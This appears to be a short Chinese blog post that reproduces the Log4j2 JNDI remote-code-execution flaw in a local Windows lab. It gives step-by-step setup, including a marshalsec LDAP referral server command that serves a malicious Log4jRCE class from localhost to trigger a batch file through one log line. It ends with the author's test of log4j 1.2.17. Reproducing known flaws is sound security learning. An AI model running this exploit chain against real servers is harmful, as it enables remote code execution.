环境:windows11
准备步骤:
1,项目代码地址:
https://gitee.com/a-cat-walker/test-log4j2.git
2,修改Log4jRCE文件中的test.bat的路径,然后编译项目
3,把编译后的Log4jRCE.class文件拷贝到webapp目录下
4,执行mvn命令启动tomcat:
mvn tomcat7:run
5,进入tools目录,然后执行:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"
6,执行Test.java文件中的main方法,打印结果为:
以上结果说明命令被一行日志调用了
网上传言log4j1.2.17版本也会有漏洞,我改了版本顺便测试了一下,并不会,这下可以安心过周末了。
参考:
https://blog.csdn.net/qq_40989258/article/details/121862363
https://zhuanlan.zhihu.com/p/443689489